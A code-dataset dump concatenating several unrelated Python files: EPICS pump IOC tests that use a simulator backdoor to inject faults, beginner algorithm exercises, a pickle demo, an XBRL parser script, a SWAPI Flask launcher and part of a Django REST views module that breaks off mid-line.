self.ca.assert_pv_not_processed(\"RESET:SP\"):\n self._lewis.backdoor_set_on_device(\"component_A\", value - 5)\n self.ca.assert_that_pv_is(\"COMP:A\", value - 5, timeout=5)\n sleep(delay / 2.0)\n\n # however if we change setpoint, the loop should start again\n self._lewis.backdoor_set_on_device(\"component_A\", value - 5)\n self.ca.set_pv_value(\"COMP:A:SP\", value - 10)\n self.ca.set_pv_value(\"COMP:B:SP\", value + 10)\n # reset should not have happened yet\n self.ca.assert_that_pv_is(\"COMP:A\", value - 5, timeout=delay / 2.0)\n self.ca.assert_that_pv_value_is_unchanged(\"COMP:A\", wait=delay / 2.0)\n\n # Reset should now happen within a further timeout/2 seconds (but give it longer to avoid races)\n with self.ca.assert_pv_processed(\"RESET:SP\"):\n self.ca.assert_that_pv_is(\"COMP:A\", value - 10, timeout=delay * 2)\n finally:\n # Put error delay back to it's initial value\n self.ca.set_pv_value(\"ERROR:DELAY\", initial_delay)\n\n def test_GIVEN_wrong_component_on_device_WHEN_running_continuous_THEN_retry_run_and_updates_component_in_correct_mode(\n self):\n self.ca.set_pv_value(\"COMP:C:SP\", 0)\n\n value = 50\n expected_value = \"Pumping\"\n self.ca.set_pv_value(\"COMP:A:SP\", value)\n self.ca.set_pv_value(\"COMP:B:SP\", value)\n\n self.ca.set_pv_value(\"START:SP\", 1)\n\n # Give the device some time running in a good state\n sleep(10)\n # Sabotage! - Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components.\n self._lewis.backdoor_set_on_device(\"component_A\", 33)\n\n self.ca.assert_that_pv_is(\"STATUS\", expected_value, timeout=30)\n\n def test_GIVEN_wrong_component_on_device_WHEN_running_timed_THEN_retry_run_and_updates_component_in_correct_mode(\n self):\n value = 50\n expected_value = \"Pumping\"\n self.ca.set_pv_value(\"COMP:A:SP\", value)\n self.ca.set_pv_value(\"COMP:B:SP\", value)\n self.ca.set_pv_value(\"TIME:RUN:SP\", 100)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", 1)\n\n # Give the device some time running in a good state\n sleep(10)\n # Sabotage! - Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components.\n self._lewis.backdoor_set_on_device(\"component_A\", 33)\n\n self.ca.assert_that_pv_is(\"STATUS\", expected_value, timeout=30)\n\n def test_GIVEN_an_ioc_WHEN_set_flowrate_THEN_flowrate_setpoint_is_correct(self):\n\n error_delay = float(self.ca.get_pv_value(\"ERROR:DELAY\"))\n sleep(2 * error_delay) # To make sure we're not in the middle of the error-checking state machine\n\n expected_value = 1.000\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_value)\n\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_value)\n\n self.ca.set_pv_value(\"TIME:RUN:SP\", 100)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n self.ca.assert_that_pv_is(\"FLOWRATE\", expected_value)\n\n def test_GIVEN_an_ioc_WHEN_set_flowrate_and_pump_volume_THEN_ioc_uses_rbv_for_calculation_of_remaining_time(self):\n expected_sp_value = 1.000\n expected_rbv_value = 2.000\n pump_for_volume = 2\n expected_time_value = (pump_for_volume / expected_rbv_value) * 60\n\n error_delay = float(self.ca.get_pv_value(\"ERROR:DELAY\"))\n sleep(2 * error_delay) # To make sure we're not in the middle of the error-checking state machine\n\n # 1. set invalid flowrate setpoint (FLOWRATE:SP)\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_sp_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_sp_value)\n\n # 2. set valid hardware flowrate (FLOWRATE:SP:RBV) via backdoor command\n self._lewis.backdoor_set_on_device(\"flowrate_rbv\", expected_rbv_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_rbv_value)\n\n # 3. set volume setpoint and start pump\n self.ca.set_pv_value(\"TIME:VOL:SP\", pump_for_volume)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n # 4. check calculated time is based on flowrate setpoint readback (:SP:RBV rather than :SP)\n self.ca.assert_that_pv_is(\"TIME:VOL:CALCRUN\", expected_time_value)\n\n def test_GIVEN_an_ioc_WHEN_set_flowrate_and_pump_time_THEN_ioc_uses_rbv_for_calculation_of_remaining_volume(self):\n expected_sp_value = 1.000\n expected_rbv_value = 2.000\n pump_for_time = 120\n expected_volume_value = (pump_for_time * expected_rbv_value) / 60\n\n error_delay = float(self.ca.get_pv_value(\"ERROR:DELAY\"))\n sleep(2 * error_delay) # To make sure we're not in the middle of the error-checking state machine\n\n # 1. set invalid flowrate setpoint (FLOWRATE:SP)\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_sp_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_sp_value)\n\n # 2. set valid hardware flowrate (FLOWRATE:SP:RBV) via backdoor command\n self._lewis.backdoor_set_on_device(\"flowrate_rbv\", expected_rbv_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_rbv_value)\n\n # 3. set time setpoint and start pump\n self.ca.set_pv_value(\"TIME:RUN:SP\", pump_for_time)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n # 4. check calculated volume is based on flowrate setpoint readback (:SP:RBV rather than :SP)\n self.ca.assert_that_pv_is(\"TIME:RUN:CALCVOL\", expected_volume_value)\n\n # test to check that the IOC updates the flowrate RBV quickly enough\n # for the remaining volume calculation to be valid. simulates operation of a script.\n def test_GIVEN_an_ioc_WHEN_set_flowrate_and_immediately_set_pump_to_start_THEN_ioc_updates_rbv_for_calculation_of_remaining_volume(\n self):\n expected_sp_value = 2.000\n script_sp_value = 3.000\n pump_for_time = 120\n\n # 1. initialize flowrate\n self.ca.set_pv_value(\"FLOWRATE:SP\", expected_sp_value)\n self.ca.assert_that_pv_is(\"FLOWRATE:SP:RBV\", expected_sp_value, timeout=5)\n\n # 2. set new flowrate and immediately set pump to run, to simulate script\n self.ca.set_pv_value(\"FLOWRATE:SP\", script_sp_value)\n self.ca.set_pv_value(\"TIME:RUN:SP\", pump_for_time)\n self.ca.set_pv_value(\"START:SP\", \"Start\")\n\n # 3. calculate remaining volume\n expected_volume_value = (pump_for_time * self.ca.get_pv_value(\"FLOWRATE:SP:RBV\")) / 60\n\n # 4. check ioc calculation is as expected\n self.ca.assert_that_pv_is(\"TIME:RUN:CALCVOL\", expected_volume_value)\n\n def test_GIVEN_an_ioc_WHEN_set_maximum_pressure_limit_THEN_maximum_pressure_limit_is_correct(self):\n expected_value = 200\n self.ca.assert_setting_setpoint_sets_readback(expected_value, \"PRESSURE:MAX\")\n\n def test_GIVEN_an_ioc_WHEN_set_minimum_pressure_limit_THEN_minimum_pressure_limit_is_correct(self):\n expected_value = 100\n self.ca.set_pv_value(\"PRESSURE:MIN:SP\", expected_value)\n self.ca.assert_setting_setpoint_sets_readback(expected_value, \"PRESSURE:MIN\")\n\n def test_GIVEN_an_ioc_WHEN_continuous_pump_set_THEN_pump_on(self):\n self.ca.set_pv_value(\"START:SP\", 1)\n\n self.ca.assert_that_pv_is(\"STATUS\", \"Pumping\")\n\n def test_GIVEN_an_ioc_WHEN_timed_pump_set_THEN_timed_pump_on(self):\n # Set a run time for a timed run\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", 1)\n\n self.ca.assert_that_pv_is(\"STATUS\", \"Pumping\")\n\n def test_GIVEN_an_ioc_WHEN_get_current_pressure_THEN_current_pressure_returned(self):\n expected_value = 300\n self._lewis.backdoor_set_on_device(\"pressure\", expected_value)\n\n self.ca.assert_that_pv_is(\"PRESSURE\", expected_value)\n\n @parameterized.expand([\n (\"component_{}\".format(suffix), suffix) for suffix in [\"A\", \"B\", \"C\", \"D\"]\n ])\n def test_GIVEN_an_ioc_WHEN_get_component_THEN_correct_component_returned(self, component, suffix):\n expected_value = 10.0\n self._lewis.backdoor_set_on_device(component, expected_value)\n\n self.ca.assert_that_pv_is(\"COMP:{}\".format(suffix), expected_value)\n\n @parameterized.expand([\n (\"COMP:{}\".format(suffix), suffix) for suffix in [\"A\", \"B\", \"C\"]\n ])\n def test_GIVEN_an_ioc_WHEN_set_component_THEN_correct_component_set(self, component, suffix):\n expected_value = 100.0\n self.ca.set_pv_value(\"COMP:{}:SP\".format(suffix), expected_value)\n if component == \"COMP:A\":\n self.ca.set_pv_value(\"COMP:B:SP\", 0)\n self.ca.set_pv_value(\"COMP:C:SP\", 0)\n elif component == \"COMP:B\":\n self.ca.set_pv_value(\"COMP:A:SP\", 0)\n self.ca.set_pv_value(\"COMP:C:SP\", 0)\n elif component == \"COMP:C\":\n self.ca.set_pv_value(\"COMP:A:SP\", 0)\n self.ca.set_pv_value(\"COMP:B:SP\", 0)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", \"Start\")\n\n self.ca.assert_that_pv_is(component, expected_value)\n\n def test_GIVEN_ioc_initial_state_WHEN_get_error_THEN_error_returned(self):\n expected_value = \"No error\"\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_ioc_in_hardware_error_state_WHEN_get_error_THEN_hardware_error_returned(self):\n expected_value = \"Hardware error\"\n self._lewis.backdoor_set_on_device(\"error\", ERROR_STATE_HARDWARE_FAULT)\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_ioc_in_error_state_WHEN_reset_error_THEN_error_reset(self):\n expected_value = \"No error\"\n self._lewis.backdoor_set_on_device(\"error\", ERROR_STATE_NO_ERROR)\n self.ca.set_pv_value(\"ERROR:SP\", \"Reset\")\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_ioc_in_error_state_WHEN_reset_error_THEN_error_reset(self):\n expected_value = \"No error\"\n self._lewis.backdoor_set_on_device(\"error\", ERROR_STATE_HARDWARE_FAULT)\n\n self.ca.assert_that_pv_is(\"ERROR\", expected_value)\n\n def test_GIVEN_device_not_connected_WHEN_get_error_THEN_alarm(self):\n self.ca.assert_that_pv_alarm_is('ERROR', ChannelAccess.Alarms.NONE, timeout=30)\n\n with self._lewis.backdoor_simulate_disconnected_device():\n self.ca.assert_that_pv_alarm_is('ERROR', ChannelAccess.Alarms.INVALID, timeout=30)\n \n # Assert alarms clear on reconnection\n self.ca.assert_that_pv_alarm_is('ERROR', ChannelAccess.Alarms.NONE, timeout=30)\n\n def test_GIVEN_timed_pump_WHEN_get_program_runtime_THEN_program_runtime_increments(self):\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.set_pv_value(\"PUMP_FOR_TIME:SP\", 1)\n\n self.ca.assert_that_pv_value_is_increasing(\"TIME\", wait=2)\n\n def test_GIVEN_timed_pump_WHEN_set_constant_pump_THEN_state_updated_to_constant_pump(self):\n # Set a run time for a timed run\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.process_pv(\"PUMP_FOR_TIME:SP\")\n expected_value = \"Pumping\"\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n self.ca.process_pv(\"START:SP\")\n expected_value = \"Pumping\"\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n def test_GIVEN_constant_pump_WHEN_set_timed_pump_THEN_state_updated_to_timed_pump(self):\n expected_value = \"Pumping\"\n\n self.ca.process_pv(\"START:SP\")\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n # Set a run time for a timed run\n self.ca.set_pv_value(\"TIME:RUN:SP\", 10000)\n self.ca.process_pv(\"PUMP_FOR_TIME:SP\")\n self.ca.assert_that_pv_is(\"STATUS\", expected_value)\n\n def test_GIVEN_input_incorrect_WHEN_set_flowrate_THEN_trouble_message_returned(self):\n self._lewis.backdoor_set_on_device(\"input_correct\", False)\n self.ca.set_pv_value(\"FLOWRATE:SP\", 0.010)\n\n self.ca.assert_that_pv_is(\"ERROR:STR\", \"[Error:stack underflow]\")\n\n def test_GIVEN_command_seq_that_would_crash_pump_WHEN_command_seq_called_THEN_pump_crashes(self):\n self.ca.set_pv_value(\"_TEST_CRASH.PROC\", 1)\n\n self.ca.assert_that_pv_alarm_is(\"COMP:A\", ChannelAccess.Alarms.INVALID, timeout=30)\n\n def test_GIVEN_pump_running_WHEN_set_file_number_command_called_THEN_program_is_busy_error(self):\n expected_value = \"[Program is Busy]\"\n self.ca.set_pv_value(\"START:SP\", 1)\n self.ca.set_pv_value(\"FILE:SP\", 0)\n\n self.ca.assert_that_pv_is(\"ERROR:STR\", expected_value)\n\n @parameterized.expand([(\"low_set_time\", 100, 1, 1),\n (\"high_set_time\", 1000, 10, 1),\n (\"non_standard_set_time\", 456, 5, 1)])\n @unstable_test(max_retries=5)\n def test_GIVEN_pump_for_volume_WHEN_pumping_THEN_device_is_pumping_set_volume(self, _, time, volume, flowrate):\n # Set a target pump time a target pump volume. When we start a pump set volume run, then the remaining\n # time should be related to the target volume, and not the target time (that would be used for a pump for time).\n set_time = time\n set_volume = volume\n set_flowrate = flowrate\n expected_time = set_volume * set_flowrate * 60 # flow rate units = mL/min, so convert to seconds\n\n self.ca.set_pv_value(\"TIME:RUN:SP\", set_time)\n self.ca.set_pv_value(\"TIME:VOL:SP\", set_volume)\n self.ca.set_pv_value(\"FLOWRATE:SP\", set_flowrate)\n\n self.ca.process_pv(\"PUMP_SET_VOLUME:SP\")\n\n self.ca.assert_that_pv_is_within_range(\"TIME:REMAINING\", min_value=expected_time - 20,\n max_value=expected_time + 20)\n\n","repo_name":"ISISComputingGroup/EPICS-IOC_Test_Framework","sub_path":"tests/jsco4180.py","file_name":"jsco4180.py","file_ext":"py","file_size_in_byte":17284,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"65"} +{"seq_id":"38003721804","text":"\ndef find_numbers(list_of_numbers):\n \n if len(list_of_numbers) == 0: \n return \"empty list\"\n \n even_num_count = 0\n for number in list_of_numbers:\n\n if (len(str(number))%2) == 0:\n even_num_count += 1\n\n return print(even_num_count)\n\n\n#find_numbers([12,345,2,6,7896])\n\n\ndef sorted_squares(list_numbers):\n\n if len(list_numbers) == 0: \n return \"empty list\"\n\n for i, number in enumerate(list_numbers):\n list_numbers[i] = list_numbers[i] ** 2\n\n return print(sorted(list_numbers)) \n\n#sorted_squares([-4,-1,0,3,10])\n\n\ndef string_permutation(string1, string2):\n\n if string1 == string2:\n return True\n elif len(string1) != len(string2):\n return False\n else: \n count = 0\n for i, char in enumerate(sorted(string1)):\n if char == sorted(string2)[i]:\n count += 1\n\n return count == len(string1)\n\n\n#print(string_permutation(\"Charlie\",\"eilrah\"))\n\n\ndef URLify(string_in):\n\n if len(string_in) == 0: \n return \"empty string\"\n\n string_out = \"\"\n for i, char in enumerate(string_in):\n if i == 0 and char == \" \": \n string_out += \"%20\"\n elif char == \" \" and string_in[i-1] !=\" \":\n string_out += \"%20\"\n else: \n string_out += char\n return string_out\n\n#print(URLify(\"Mr John Smith \"))\n\narr = [1, 2, 3, 4]\n\n# a1 >= a2 <= a3 >= a4 <= a5 ...\n# [2, 1, 4, 3] (return this one)\n# [4, 1, 3, 2]\n# [1,2,3,4,5]\n#[2,1,4,3,5]\n# If there are mutliple answers, return the one which is lexicographically smallest\n\n# [1, 2, 3]\n# i = 0\n# i = 2\n\n# for i range(3)\n\n# for i range(0, 3, 2)\n\ndef wave_array(list_in):\n\n if len(list_in) ==0:\n return []\n elif len(list_in) == 1:\n return list_in\n else: \n list_in = sorted(list_in)\n\n for i in range(0,len(list_in)-1,2):\n temp = list_in[i]\n list_in[i] = list_in[i+1]\n list_in[i+1]= temp\n \n return list_in\n\nprint(wave_array([1, 2, 3, 4, 5, 6, 7]))\n \n\n\n\n\n# [1, 2, 3, 4] = [2,1,4,3]\n# [1, 2, 3, 4, 5] = [2,1,4,3,5]","repo_name":"CharlieShelbourne/algos-practice","sub_path":"dataStructures/data_structures.py","file_name":"data_structures.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"29724453249","text":"import pickle\r\n\r\nmyUser = {'name': 'Jasamrit Rahala',\r\n 'posts': [\r\n \r\n {'Title': 'Title of the post',\r\n 'Content': 'Content of the post',\r\n 'Date': '10th March 2020'},\r\n \r\n {'Title': 'First day at Teens In AI 2020',\r\n 'Content': 'Wow I had the best day today, I learnt all about the ethics of technology and the process of design thinking',\r\n 'Date': '25th March 2020'}\r\n \r\n ]\r\n }\r\n\r\n\r\npickle.dump(myUser, open('myUser.prb', 'wb'))\r\n\r\nmyUser = pickle.load(open('myUser.prb', 'rb'))\r\nprint(myUser, '\\n has been successfully pickled')\r\n","repo_name":"JRahala/Flask-Introduction","sub_path":"6) Requests/init_user.py","file_name":"init_user.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"13016411333","text":"from pysecxbrl.parsing import SECParser\nfrom pysecxbrl.extract import XBRLExtractor\n\nimport os\n\nparser = SECParser()\nextractor = XBRLExtractor()\n\n# 'temp-data/0001564590-20-023322-xbrl/geos-20200331.xml'\n# temp-data/1002517_20200508-0001002517-20-000034-xbrl/nuan0331202010-q.htm.xml\n\nfolder = \"temp-data/1002517_20200508-0001002517-20-000034-xbrl/\"\n\nfiles = extractor.identifyFiles(folder)\nprint(files)\n\nmain_data_f = files[\"main\"][0]\ncalc_f = files[\"calculation\"][0]\n\nwith open(os.path.join(folder, calc_f)) as f:\n txt_calc = f.read()\n calc_elems = parser.parseCalculationXML(txt_calc)\n\n print(calc_elems)\n\nwith open(os.path.join(folder, main_data_f)) as f:\n txt = f.read()\n ctx_elems, data_elems = parser.parseMainXBRL(txt)\n\n print(\"parsing result: \")\n print(ctx_elems)\n print(data_elems)\n print(len(ctx_elems))\n print(len(data_elems))\n","repo_name":"zhaolewen/py-sec-xbrl","sub_path":"test-parse.py","file_name":"test-parse.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"65"} +{"seq_id":"15517756254","text":"import connexion\nimport logging\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n app = connexion.App(__name__, specification_dir='./api/', options={\"swagger_ui\": True})\n #app.add_api('swapi-oa3.yaml', arguments={'title': 'SWAPI OpenAPI 3'})\n app.add_api('swapi-oa3.yaml',\n arguments={'title': 'SWAPI OpenAPI 3'},\n strict_validation=False,\n validate_responses=False,\n resolver=resolve_swapi_function\n )\n app.run(port=5000, debug=True)\n\n\ndef resolve_swapi_function(function_name):\n from . import swapi_controller\n\n swapi_functions = {'index': swapi_controller.index,\n 'get_all': swapi_controller.get_all,\n 'get_single': swapi_controller.get_single}\n\n return swapi_functions\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kewl-deus/swapi","sub_path":"swapi-flask/swapi/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"37652227640","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, status, views\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom .models import (\n Question,\n Answer,\n Course,\n UserCourseRelation,\n StrictMode,\n Hint,\n QuestionMedia,\n QuestionsSubscriptionRelation,\n)\nfrom .serializers import (\n QuestionSerializer,\n AnswerSerializer,\n CourseSerializer,\n QuestionListSerializer,\n CourseCreatedSerializer,\n RelationSerializer,\n RelationUnsubscribeSerializer,\n AnswerFormDataSerializer,\n StrictModeSerializer,\n QuestionMediaSerializer,\n HintSerializer,\n)\nfrom exam_auth.models import Profile\nfrom django.db.models import Q\nfrom django.contrib.auth.models import AnonymousUser\nfrom exam_backend.utils import upload_media_file\nimport requests\nfrom datetime import datetime\nimport time\n\n\nclass QuestionListViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n serializer_class = QuestionListSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\"]\n\n def get_queryset(self):\n user = self.request.user\n user_subscriptions = QuestionsSubscriptionRelation.objects.filter(\n subscriber=user\n )\n if user.is_superuser:\n queryset = Question.objects.all()\n return queryset\n\n return Question.objects.all().filter(\n Q(user=user) | Q(user__in=[sub.subscription for sub in user_subscriptions])\n )\n\n\nclass UserSubcsriptionView(views.APIView):\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n def post(self, request):\n user = self.request.user\n data = self.request.data\n profile = Profile.objects.all().filter(user=user).first()\n if not profile or not data.get(\"subscription\"):\n return Response({\"message\": \"Profile not found\"}, 404)\n subscription = Profile.objects.all().filter(id=data[\"subscription\"]).first()\n if not subscription:\n return Response({\"message\": \"Profile not found\"}, 404)\n existing_subcsription = QuestionsSubscriptionRelation.objects.filter(\n subscriber=user, subscription=subscription.user\n )\n if not existing_subcsription:\n relation = QuestionsSubscriptionRelation(\n subscriber=user, subscription=subscription.user\n )\n relation.save()\n return Response({\"message\": \"Subscribed\"}, 200)\n else:\n existing_subcsription.delete()\n return Response({\"message\": \"Unsubscribed\"}, 200)\n\n\nclass CourseDemoAllowView(views.APIView):\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n def post(self, request):\n user = self.request.user\n data = self.request.data\n course = Course.objects.all().filter(token=data[\"course\"]).first()\n if not course:\n return Response({\"message\": \"Course not found\"}, 404)\n if not course.demo_allowed:\n course.demo_allowed = True\n course.save()\n return Response({\"message\": \"Enabled\"}, 200)\n else:\n course.demo_allowed = False\n course.save()\n return Response({\"message\": \"Disabled\"}, 200)\n\n\nclass AnswerFormDataViewSet(viewsets.ModelViewSet):\n queryset = Answer.objects.all()\n serializer_class = AnswerFormDataSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\", \"patch\", \"get\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Answer.objects.all().filter(\n question=self.request.query_params.get(\"id\"),\n question__user=self.request.user,\n deleted=False,\n )\n\n return queryset\n\n user = self.request.user\n if user.is_superuser:\n queryset = Answer.objects.all().filter(deleted=False)\n return queryset\n return Answer.objects.all().filter(question__user=user, deleted=False)\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n question = Question.objects.all().get(id=validated_data[\"question\"])\n answer = Answer(\n question=question,\n text=validated_data[\"text\"],\n correct=validated_data[\"correct\"].capitalize(),\n weight=validated_data[\"weight\"],\n priority=validated_data[\"priority\"],\n deleted=False,\n )\n if validated_data[\"image\"] != \"null\":\n answer.image = validated_data[\"image\"]\n answer.save()\n return Response({\"answer\": answer.id}, status=status.HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n\n answer = self.get_object()\n if \"text\" in validated_data:\n answer.text = validated_data[\"text\"]\n if \"image\" in validated_data:\n\n if validated_data[\"image\"] == \"null\":\n answer.image = \"\"\n else:\n if validated_data[\"image\"] != \"stay\":\n answer.image = validated_data[\"image\"]\n if \"correct\" in validated_data:\n answer.correct = (validated_data[\"correct\"]).capitalize()\n if \"weight\" in validated_data:\n answer.weight = validated_data[\"weight\"]\n if \"priority\" in validated_data:\n answer.priority = validated_data[\"priority\"]\n answer.save()\n return Response({\"answer\": answer.id}, status=status.HTTP_201_CREATED)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass QuestionViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all()\n\n serializer_class = QuestionSerializer\n\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"put\", \"delete\", \"patch\"]\n lookup_field = \"id\"\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n\n question = Question(\n user=self.request.user,\n title=validated_data[\"title\"],\n text=validated_data[\"text\"],\n answer_type=validated_data[\"answer_type\"],\n )\n\n if \"attempts_number\" in self.request.data:\n\n if self.request.data[\"attempts_number\"] != \"null\":\n\n question.attempts_number = self.request.data[\"attempts_number\"]\n else:\n pass\n # question.attempts_number = None\n if \"answers_number\" in validated_data:\n question.answers_number = validated_data[\"answers_number\"]\n if \"image\" in validated_data and validated_data[\"image\"] != \"null\":\n question.image_url = upload_media_file(validated_data[\"image\"])\n if \"audio\" in validated_data and validated_data[\"audio\"] != \"null\":\n question.audio_url = upload_media_file(validated_data[\"audio\"])\n if \"difficulty\" in validated_data:\n question.difficulty = validated_data[\"difficulty\"]\n if \"comment\" in validated_data:\n question.comment = validated_data[\"comment\"]\n\n question.save()\n # return QuestionSerializer(question), 201\n return Response(\n QuestionSerializer(question).data, status=status.HTTP_201_CREATED\n )\n\n def get_queryset(self):\n user = self.request.user\n if self.request.method == \"GET\":\n user_subscriptions = QuestionsSubscriptionRelation.objects.filter(\n subscriber=user\n )\n return Question.objects.all().filter(\n Q(id=self.request.query_params.get(\"id\"))\n & (\n Q(user=user)\n | Q(user__in=[sub.subscription for sub in user_subscriptions])\n )\n )\n\n if (\n user.is_superuser\n ): # TODO: either do this for all get's or delete it from here, no more methods support this logic\n queryset = Question.objects.all()\n return queryset\n return Question.objects.all().filter(user=user)\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n if self.request.method == \"DELETE\":\n\n # if it is delete request, then mark answer as 'deleted' and delete only question\n answers = Answer.objects.all().filter(question=instance.id)\n for ans in answers:\n ans.deleted = True\n ans.save()\n instance.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n else:\n Answer.objects.all().filter(question=instance.id).delete()\n # otherwise delete question with constraints\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n question = self.get_object()\n # answers = Answer.objects.all().filter(question = question)\n # answers.delete() # we assume that there will be new answers after question\n\n question.title = validated_data[\"title\"]\n question.text = validated_data[\"text\"]\n question.answer_type = validated_data[\"answer_type\"]\n # question = Question(user=self.context['request'].user, title=validated_data['title'],\n # text=validated_data['text'], answer_type=validated_data['answer_type'])\n if \"attempts_number\" in validated_data:\n if validated_data[\"attempts_number\"] != \"null\" and (\n question.attempts_number is None\n or question.attempts_number <= validated_data[\"attempts_number\"]\n ):\n question.attempts_number = validated_data[\"attempts_number\"]\n if \"answers_number\" in validated_data:\n question.answers_number = validated_data[\"answers_number\"]\n if \"difficulty\" in validated_data and validated_data[\"difficulty\"] != \"null\":\n question.difficulty = validated_data[\"difficulty\"]\n if \"comment\" in validated_data:\n question.comment = validated_data[\"comment\"]\n\n if \"image\" in validated_data:\n\n if validated_data[\"image\"] == \"null\":\n question.image = \"\"\n else:\n if validated_data[\"image\"] != \"stay\":\n # question.image = validated_data['image']\n question.image_url = upload_media_file(validated_data[\"image\"])\n if \"audio\" in validated_data:\n\n if validated_data[\"audio\"] == \"null\":\n question.audio = \"\"\n else:\n if validated_data[\"audio\"] != \"stay\":\n question.audio = validated_data[\"audio\"]\n question.audio_url = upload_media_file(validated_data[\"audio\"])\n question.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass AnswerViewSet(viewsets.ModelViewSet):\n queryset = Answer.objects.all()\n serializer_class = AnswerSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"put\", \"delete\", \"patch\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Answer.objects.all().filter(\n question=self.request.query_params.get(\"id\"),\n question__user=self.request.user,\n deleted=False,\n )\n\n return queryset\n\n user = self.request.user\n if user.is_superuser:\n queryset = Answer.objects.all().filter(deleted=False)\n return queryset\n return Answer.objects.all().filter(question__user=user, deleted=False)\n\n def create(self, request, *args, **kwargs):\n\n serializer = self.get_serializer(\n data=request.data, many=isinstance(request.data, list)\n )\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass CourseViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n lookup_field = \"token\" # used to allow delete on /api/courses//\n serializer_class = CourseSerializer\n\n http_method_names = [\"get\", \"post\", \"patch\", \"delete\"]\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n\n questions_to_parse = request.POST.getlist(\"questions\")\n # https://stackoverflow.com/questions/12101658/how-to-get-an-array-in-django-posted-via-ajax\n\n course = Course(\n name=validated_data[\"name\"],\n description=validated_data[\"description\"],\n questions_number=validated_data[\"questions_number\"],\n token=validated_data[\"token\"],\n author=validated_data[\"author\"],\n )\n course.perfect_mark = self.request.data[\"perfect_mark\"]\n course.good_mark = self.request.data[\"good_mark\"]\n course.satisfactory_mark = self.request.data[\"satisfactory_mark\"]\n if \"perfect_audio\" in self.request.data:\n if self.request.data[\"perfect_audio\"] != \"null\":\n # course.perfect_audio = self.request.data['perfect_audio']\n course.perfect_audio_url = upload_media_file(\n validated_data[\"perfect_audio\"]\n )\n else:\n course.perfect_audio = None\n if \"good_audio\" in self.request.data:\n if self.request.data[\"good_audio\"] != \"null\":\n # course.good_audio = self.request.data['good_audio']\n course.good_audio_url = upload_media_file(validated_data[\"good_audio\"])\n else:\n course.good_audio = None\n if \"satisfactory_audio\" in self.request.data:\n if self.request.data[\"satisfactory_audio\"] != \"null\":\n # course.satisfactory_audio = 